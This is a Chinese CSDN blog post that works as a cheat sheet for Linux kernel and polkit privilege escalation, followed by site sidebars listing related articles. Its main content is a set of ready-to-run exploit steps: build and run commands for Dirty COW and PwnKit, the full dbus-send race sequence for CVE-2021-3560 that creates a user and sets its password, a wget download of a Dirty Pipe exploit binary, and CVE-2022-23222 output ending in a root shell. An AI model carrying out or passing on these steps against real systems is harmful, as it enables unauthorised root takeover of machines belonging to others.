WEB渗透Linux提权篇-漏洞提权

最新推荐文章于 2024-09-13 16:37:02 发布
最新推荐文章于 2024-09-13 16:37:02 发布
阅读量300 收藏 5
点赞数 10
分类专栏: 渗透测试 文章标签: linux 渗透测试 网络安全 WEB安全 WEB渗透 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59468567/article/details/141885947
版权

 往期文章

WEB渗透Linux提权篇-提权工具合集-CSDN博客 

WEB渗透Linux提权篇-环境变量提权-CSDN博客

WEB渗透Linux提权篇-可写文件提权-CSDN博客

WEB渗透Linux提权篇-查找辅助信息-CSDN博客

 

用到的工具:windows、Linux、Mac提权脚本整理:夸克网盘分享 

 

Linux脏牛提权
https://github.com/FireFart/dirtycow
$gcc -pthread dirty.c -o dirty –lcrypt
$./dirty passwd 
生成账户密码
https://github.com/gbonacini/CVE-2016-5195
$make
$./dcow -s

 

CVE-2021-4034
https://github.com/berdav/CVE-2021-4034
只需执行make,./cve-2021-4034然后get root shell

 

CVE-2021-3560
检查执行命令所需时间
>time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1
提前结束(多运行几次)
>dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1 & sleep 0.0035s ; kill $!
生成密码
>openssl passwd -5 ignite@123
执行(多运行几次)
>dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1001 org.freedesktop.Accounts.User.SetPassword string:'$5$F2KwiUlWkn2i8DC.$rw9AOjKsmK83DhncqehVUzOKVqq.ArwS2G8eQKVntv7' string:BestHackingTutorials & sleep 0.0035s ; kill $!
>su ignite
>password: ignite@123
>whoami
>id
>sudo bash获取root

 

CVE-2022-0847
>wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64
>./traitor-amd64 --exploit kernel:CVE-2022-0847
>whoami
>id
或
>git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git
>cd CVE-2022-0847-DirtyPipe-Exploit
>./compile.sh
>./exploit

 

CVE-2022-23222
https://github.com/tr3ee/CVE-2022-23222

$ make
cc -I include -static -w -o exploit exploit.c
$ ./exploit 
[*] phase(1/8) 'create bpf map(s)' running
[+] phase(1/8) 'create bpf map(s)' done
[*] phase(2/8) 'do some leak' running
[+] phase(2/8) 'do some leak' done
[*] phase(3/8) 'prepare arbitrary rw' running
[+] phase(3/8) 'prepare arbitrary rw' done
[*] phase(4/8) 'spawn processes' running
[+] phase(4/8) 'spawn processes' done
[*] phase(5/8) 'find cred (slow)' running
[+] phase(5/8) 'find cred (slow)' done
[*] phase(6/8) 'overwrite cred' running
[+] phase(6/8) 'overwrite cred' done
[*] phase(7/8) 'spawn root shell' running
[+] Enjoy root!
# id
uid=0(root) gid=0(root) groups=65534(nobody)
# exit
[+] phase(7/8) 'spawn root shell' done
[*] phase(8/8) 'clean up the mess' running
[+] phase(8/8) 'clean up the mess' done
Pluto-2003
关注
专栏目录
[网络安全自学] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一Web渗透的基础性文章,希望对您有所帮助。
103.网络安全渗透测试—[权限提升1]—[Linux内核漏洞提权]
qwsn
02-15 7280
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、LINUX 内核漏洞提权 1、漏洞背景: 2、漏洞利用: (1)实验环境 (2)靶机链接 (3)突破MIME类型限制文件上传获取webshell (4)创建交互式shell (5)查看linux发行版 (6)查找可用的提权exp (7)进行提权 (8)切换shell
Linux提权漏洞
2301_76786857的博客
02-22 469
在渗透过程中,有时利用某些漏洞可以获取一个低权限的用户,然后想办法提权,提升到root用户权限,从而控制整个系统。
Linux内核提权漏洞(Dirty-pipe)复现_linux提权漏洞
xnxqwzy的博客
10-08 466
CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。
Python3 通过dbus获取客户端缓存的登录用户
Katherine130的博客
12-09 623
DBus分为两种类型: system bus(系统总线),用于系统(Linux)和用户程序之间进行通信和消息的传递; session bus(回话总线),用于桌面(GNOME, KDE等)用户程序之间进行通信。 import dbus session_bus = dbus.SessionBus() system_bus = dbus.SystemBus() To obtain a proxy object, call the get_object method on the Bus. For e.
xrdp 远程登录需要输入很多次密码
热门推荐
wu_weijie的博客
09-09 1万+
每次通过 xrdp 远程登录 Ubuntu,至少要输入 4 次密码。如果远程客户端使用多屏幕,每个屏幕需要输入 2 次密码。如此繁琐的操作,如何进行简化?
Linux内核提权漏洞(Dirty-pipe)复现
qq_69775412的博客
07-25 658
CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。
linux提权总结8大类型,30多种方式
09-27
渗透测试安全领域中,Linux提权是一项重要的技能,它能够帮助安全研究人员在发现系统漏洞后进一步提升权限,以便更好地理解系统存在的安全隐患,并采取相应的安全措施。本文档根据给定的文件信息进行了详细的...
Lampião: 1(Linux提权-脏牛内核漏洞
weixin_51423993的博客
01-19 3879
靶机环境下载地址https://www.vulnhub.com/entry/lampiao-1,249/ 环境:攻击机:kali虚拟机192.168.76.132 靶机:ip未知 过程:探针目标-CMS漏洞利用-脚本探针提权漏洞-利用内核提权 靶机密码也没有,ip也没有 探针目标 靶机和kali在同网段,所以kali用nmap扫描同网段存活主机和其端口 namp 192.168.76.0/24 扫出一个192.168.76.141的主机 继续扫他的端口 nmap -p1 -65535 192.16
20201231WEB渗透学习之Linux内核提权
qq_45290991的博客
01-01 912
我们都知道,如果已经获取了目标服务器(网站)的后门shell,那么我们接下啦要做的事情是什么????对,就是进程迁移(把自己的shell隐藏到一个不容易被肉鸡检测到的地方,比如说一个很深的目录下),但是要执行进程迁移,我们需要root权限,所以实际上我们应该先提升攻击者的权限,来使得我们有着更高的权限(比如说root)去操控肉鸡。在提升权限的过程中,我们常常用到一个能够和肉鸡建立实时会话的TCP工具——————Netcat。网上的教程一般都是先开列出来这个工具的命令,然后后面接上一些实际例子,这样有好处也
Linux Polkit权限提升漏洞(CVE-2021-3560)
weixin_42489549的博客
06-16 6905
polkit是默认安装在许多 Linux 发行版上的系统服务。它由systemd 使用,因此任何使用 systemd 的 Linux 发行版也使用 polkit。该漏洞使无特权的本地用户能够获得系统上的 root shell。 关于polkit 当您看到如下所示的对话框时,polkit是在后台运行的系统服务: 它本质上扮演着法官的角色。如果你想做一些需要更高权限的事情——例如,创建一个新的用户帐户——那么决定是否允许你这样做是 polkit 的工作。对于某些请求,polkit 会立即做出允许或拒绝的决定,而
linux中开机突然进不去图形,shit.....又无法开机自动进入图形界面了。。
weixin_42191440的博客
05-12 761
该楼层疑似违规已被系统折叠隐藏此楼查看此楼/var/log/lightdm/lightdm.log[+0.00s] DEBUG: Logging to /var/log/lightdm/lightdm.log[+0.00s] DEBUG: Starting Light Display Manager 1.10.0, UID=0 PID=1181[+0.00s] DEBUG: Loading co...
Linux提权
小袁的博客
11-30 1418
linux提权
Linux提权之内核漏洞提权
m0_74282605的博客
03-30 998
在渗透过程中,有时利用某些漏洞可以获取一个低权限的用户,然后想办法提权,提升到root用户权限,从而控制整个系统。在获取到低权限shell后,通常会检查操作系统的发行版本、内核版本,老版本的系统可能会存在一些漏洞,于是我们可以利用这些版本漏洞进行提权。下面给大家带来的是一些内核提权的例子。今天简单向大家讲解了利用内核漏洞去进行提权的操作,可以发现内核漏洞最主要的就是信息获取后寻找对应的内核漏洞再去攻击,因为内核漏洞有很多所以就挑出了两个常见而且常用的来给大家演示一下,如果对本文感兴趣不妨一键三连。
提权——Linux
最新发布
weixin_58666006的博客
09-13 1496
拿下getshell后不是管理员账户则需要提权
Linux内核漏洞提权
qq_61553520的博客
05-31 1485
当SUID权限被设置在一个可执行文件上时,执行该文件的用户将以文件所有者的身份执行,即使该用户没有相应的权限。举例:test.sh原来的权限是-rwxr-xr-x,当执行chmod u+s test.sh命令后,它的权限就会变成-rwsr-xr-x。SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。执行以下命令,确认以root身份运行。的形式运行命令时,使用的是root身份。
Linux-dirty pipe内核提权漏洞复现-编号:CVE-2022-0847
08-31 1393
漏洞属于Linux提权漏洞, 攻击者可利用该漏洞使任何非特权(本地)用户在易受攻击的主机上获得root权限,非特权进程可以将代码注入到根进程使得攻击者可获取服务器的所有权限。与该漏洞CVE-2022-0847(Dirty Pipe)类似的另一个漏洞CVE-2016-5195 “Dirty Cow”(脏牛提权),很多人应该了解并且能利用该漏洞。...
解决ubuntu和windows10双系统时访问window下的磁盘需要输入密码的
静水流深
05-27 2583
首先使用命令进入下面这个目录: cd /usr/share/polkit-1/actions LMX@localhost:/usr/share/polkit-1/actions$ ll org.freedesktop.* -rw-r--r-- 1 root root 19755 11月 4 2016 org.freedesktop.accounts.policy -rw-r--r...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值